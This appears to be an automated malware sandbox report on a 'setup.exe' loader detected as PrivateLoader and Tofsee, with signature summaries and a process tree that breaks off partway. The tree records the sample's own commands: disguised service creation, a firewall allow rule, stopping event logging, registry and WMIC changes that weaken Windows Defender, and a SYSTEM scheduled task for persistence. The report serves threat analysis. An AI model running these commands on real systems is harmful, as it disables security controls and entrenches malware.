Resubmissions

08-06-2024 02:24

240608-cvn1aaff5x 8

08-06-2024 02:06

240608-cjt26agd83 10

Analysis

  • max time kernel
    148s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    08-06-2024 02:06

General

  • Target

    setup.exe

  • Size

    631.4MB

  • MD5

    1e88e52ae4838a0aa179c21784cbbb4a

  • SHA1

    b218793843ee4af2842b5182d241ea0f121abffa

  • SHA256

    763711499a127ef7f46615a3275ef62afa097d65e948e98678b81fa0e0315cad

  • SHA512

    89dfe218101559d02524f548d806504a90987c9c66f8f7d8280dc0446bdaeebdf00725f479c5cc99db37b589d19f37b8a229157164690eca3698f9c0480f1110

  • SSDEEP

    98304:rOuBF3zj5prjsd8VNCofaoUhXo8uG9pmSgQ7gCbHRd3bcEo:qunj5prvX8uGxgQZLcEo

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Launches sc.exe 7 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Modifies firewall policy service
    • Checks computer location settings
    • Loads dropped DLL
    • Drops file in System32 directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe
      C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe
      2⤵
      • Executes dropped EXE
      PID:2704
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cdonhiov\
        3⤵
          PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ubilaohr.exe" C:\Windows\SysWOW64\cdonhiov\
          3⤵
            PID:2308
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create cdonhiov binPath= "C:\Windows\SysWOW64\cdonhiov\ubilaohr.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe\"" type= own start= auto DisplayName= "wifi support"
            3⤵
            • Launches sc.exe
            PID:532
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description cdonhiov "wifi internet conection"
            3⤵
            • Launches sc.exe
            PID:2616
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" start cdonhiov
            3⤵
            • Launches sc.exe
            PID:1228
          • C:\Windows\SysWOW64\netsh.exe
            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            3⤵
            • Modifies Windows Firewall
            PID:1680
        • C:\Users\Admin\Documents\SimpleAdobe\PY6JR66TX_lJW87EhbKf9G5y.exe
          C:\Users\Admin\Documents\SimpleAdobe\PY6JR66TX_lJW87EhbKf9G5y.exe
          2⤵
          • Executes dropped EXE
          PID:2716
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            3⤵
              PID:2808
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              3⤵
                PID:2964
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                3⤵
                  PID:2420
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  3⤵
                    PID:1080
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "RULTVSKP"
                    3⤵
                    • Launches sc.exe
                    PID:664
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
                    3⤵
                    • Launches sc.exe
                    PID:2280
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    3⤵
                    • Launches sc.exe
                    PID:1488
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "RULTVSKP"
                    3⤵
                    • Launches sc.exe
                    PID:316
                • C:\Users\Admin\Documents\SimpleAdobe\7bhyz3LpAvvVyJ3C065BJNmg.exe
                  C:\Users\Admin\Documents\SimpleAdobe\7bhyz3LpAvvVyJ3C065BJNmg.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2464
                • C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe
                  C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2524
                  • C:\Users\Admin\AppData\Local\Temp\is-ENR9K.tmp\QJ4lvEujT8VBQNIqhfhxIiKK.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-ENR9K.tmp\QJ4lvEujT8VBQNIqhfhxIiKK.tmp" /SL5="$B015A,4611430,54272,C:\Users\Admin\Documents\SimpleAdobe\QJ4lvEujT8VBQNIqhfhxIiKK.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2924
                    • C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe
                      "C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe" -i
                      4⤵
                        PID:1888
                      • C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe
                        "C:\Users\Admin\AppData\Local\Moon VideoToAudio\moonvideo2audio32.exe" -s
                        4⤵
                          PID:1548
                    • C:\Users\Admin\Documents\SimpleAdobe\jnUIUmQJ3EohHeAUoNAO8Ye0.exe
                      C:\Users\Admin\Documents\SimpleAdobe\jnUIUmQJ3EohHeAUoNAO8Ye0.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:2440
                    • C:\Users\Admin\Documents\SimpleAdobe\rKabpfuRcT2t4Plzk0ocnBr8.exe
                      C:\Users\Admin\Documents\SimpleAdobe\rKabpfuRcT2t4Plzk0ocnBr8.exe
                      2⤵
                      • Executes dropped EXE
                      PID:1488
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        3⤵
                          PID:992
                          • C:\ProgramData\FIDHIEBAAK.exe
                            "C:\ProgramData\FIDHIEBAAK.exe"
                            4⤵
                              PID:3044
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 64
                                5⤵
                                • Program crash
                                PID:928
                            • C:\ProgramData\CBFBKFIDHI.exe
                              "C:\ProgramData\CBFBKFIDHI.exe"
                              4⤵
                                PID:2728
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 108
                                  5⤵
                                  • Program crash
                                  PID:1652
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HIDHDGDHJEGH" & exit
                                4⤵
                                  PID:2740
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 10
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:2576
                            • C:\Users\Admin\Documents\SimpleAdobe\b3PG7xBdfbKLfPJZCZ0tmzAD.exe
                              C:\Users\Admin\Documents\SimpleAdobe\b3PG7xBdfbKLfPJZCZ0tmzAD.exe
                              2⤵
                                PID:1448
                                • C:\Users\Admin\AppData\Local\Temp\7zSCC92.tmp\Install.exe
                                  .\Install.exe
                                  3⤵
                                    PID:1948
                                    • C:\Users\Admin\AppData\Local\Temp\7zSE060.tmp\Install.exe
                                      .\Install.exe /piRmdidQ "525403" /S
                                      4⤵
                                        PID:1308
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          5⤵
                                            PID:444
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              6⤵
                                                PID:2744
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  7⤵
                                                    PID:652
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      8⤵
                                                        PID:2432
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    6⤵
                                                      PID:880
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        7⤵
                                                          PID:1852
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            8⤵
                                                              PID:2712
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          6⤵
                                                            PID:712
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              7⤵
                                                                PID:804
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  8⤵
                                                                    PID:284
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                6⤵
                                                                  PID:688
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    7⤵
                                                                      PID:2024
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        8⤵
                                                                          PID:2508
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      6⤵
                                                                        PID:1692
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          7⤵
                                                                            PID:1876
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              8⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:2092
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                9⤵
                                                                                  PID:1840
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                          5⤵
                                                                            PID:2496
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                              6⤵
                                                                                PID:2820
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                  7⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:2952
                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                    8⤵
                                                                                      PID:3000
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "bGTnZQDECKwDuNSWyq" /SC once /ST 02:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nfanITE.exe\" FN /VwEdidmRQA 525403 /S" /V1 /F
                                                                                5⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:2864
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq"
                                                                                5⤵
                                                                                  PID:2736
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C schtasks /run /I /tn bGTnZQDECKwDuNSWyq
                                                                                    6⤵
                                                                                      PID:532
                                                                                      • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn bGTnZQDECKwDuNSWyq
                                                                                        7⤵
                                                                                          PID:1572
                                                                              • C:\Users\Admin\Documents\SimpleAdobe\uX8PYYcq_TwO8HXcs8ccDdDm.exe
                                                                                C:\Users\Admin\Documents\SimpleAdobe\uX8PYYcq_TwO8HXcs8ccDdDm.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:1284
                                                                                • C:\Users\Admin\AppData\Local\Temp\ajEAA0.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\ajEAA0.exe" /relaunch=8 /was_elevated=1 /tagdata
                                                                                  3⤵
                                                                                    PID:2484
                                                                                    • C:\Users\Admin\AppData\Local\Temp\nsuEC16.tmp\AVGBrowserUpdateSetup.exe
                                                                                      AVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome"
                                                                                      4⤵
                                                                                        PID:1792
                                                                                        • C:\Program Files (x86)\GUM20.tmp\AVGBrowserUpdate.exe
                                                                                          "C:\Program Files (x86)\GUM20.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome"
                                                                                          5⤵
                                                                                            PID:1992
                                                                                            • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                                                              "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc
                                                                                              6⤵
                                                                                                PID:1872
                                                                                              • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                                                                "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver
                                                                                                6⤵
                                                                                                  PID:1376
                                                                                                  • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                                                                                                    "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                                                                                                    7⤵
                                                                                                      PID:316
                                                                                                    • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                                                                                                      "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                                                                                                      7⤵
                                                                                                        PID:2840
                                                                                                      • C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe
                                                                                                        "C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"
                                                                                                        7⤵
                                                                                                          PID:2624
                                                                                                      • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                                                                        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTY5My42IiBzaGVsbF92ZXJzaW9uPSIxLjguMTY5My42IiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0iezQyNUZGMkVBLUU0NEYtNDE0Ri04NDRCLUM2RTZFNDNCNTU4OX0iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9IntGMzQzQzE4QS01NEUyLTQ0OEMtQkI5QS1GNzM4QTkzQkRFM0V9IiB1c2VyaWRfZGF0ZT0iMjAyNDA2MDgiIG1hY2hpbmVpZD0iezAwMDA5QkIwLTk4NjYtMzU5Mi1BM0E2LTA4NkJDQzI5MDlFN30iIG1hY2hpbmVpZF9kYXRlPSIyMDI0MDYwOCIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9Ins3MjJGNTQ1Qi1FNTBGLTREQjktOTFEMC05OTZFMjI5MzQ3NzF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjYuMS43NjAxLjAiIHNwPSJTZXJ2aWNlIFBhY2sgMSIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNjkzLjYiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTI0OSIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNDIxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                        6⤵
                                                                                                          PID:2856
                                                                                                        • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                                                                          "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Diexplore --import-cookies --auto-launch-chrome" /installsource otherinstallcmd /sessionid "{425FF2EA-E44F-414F-844B-C6E6E43B5589}" /silent
                                                                                                          6⤵
                                                                                                            PID:2712
                                                                                                  • C:\Users\Admin\Documents\SimpleAdobe\dgNvhupeeLIaker_Kh0LbY9P.exe
                                                                                                    C:\Users\Admin\Documents\SimpleAdobe\dgNvhupeeLIaker_Kh0LbY9P.exe
                                                                                                    2⤵
                                                                                                      PID:2824
                                                                                                  • C:\Windows\SysWOW64\cdonhiov\ubilaohr.exe
                                                                                                    C:\Windows\SysWOW64\cdonhiov\ubilaohr.exe /d"C:\Users\Admin\Documents\SimpleAdobe\uqxXz2hM83zG7WZ_wXYxN3uY.exe"
                                                                                                    1⤵
                                                                                                      PID:2192
                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                        svchost.exe
                                                                                                        2⤵
                                                                                                          PID:2444
                                                                                                      • C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe
                                                                                                        "C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /svc
                                                                                                        1⤵
                                                                                                          PID:1244
                                                                                                          • C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\AVGBrowserInstaller.exe
                                                                                                            "C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\AVGBrowserInstaller.exe" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=iexplore --import-cookies --auto-launch-chrome --system-level
                                                                                                            2⤵
                                                                                                              PID:2256
                                                                                                              • C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\CR_5258D.tmp\setup.exe
                                                                                                                "C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\CR_5258D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\CR_5258D.tmp\SECURE.PACKED.7Z" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=iexplore --import-cookies --auto-launch-chrome --system-level
                                                                                                                3⤵
                                                                                                                  PID:1292
                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\CR_5258D.tmp\setup.exe
                                                                                                                    "C:\Program Files (x86)\AVG\Browser\Update\Install\{B784679E-E280-4EE2-9A1F-3C119D217885}\CR_5258D.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=109.0.24111.121 --initial-client-data=0x14c,0x150,0x154,0x120,0x158,0x13fd07c40,0x13fd07c50,0x13fd07c60
                                                                                                                    4⤵
                                                                                                                      PID:1144
                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                taskeng.exe {3AE308AD-6CB6-4380-B465-0258D54D38AF} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                1⤵
                                                                                                                  PID:2208
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nfanITE.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\dzNXoKKbKVNKsqo\nfanITE.exe FN /VwEdidmRQA 525403 /S
                                                                                                                    2⤵
                                                                                                                      PID:2996
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                        3⤵
                                                                                                                          PID:3048
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                            4⤵
                                                                                                                              PID:3020
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                5⤵
                                                                                                                                  PID:300
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    6⤵
                                                                                                                                      PID:1536
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                    PID:1708
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                      5⤵
                                                                                                                                        PID:2356
                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
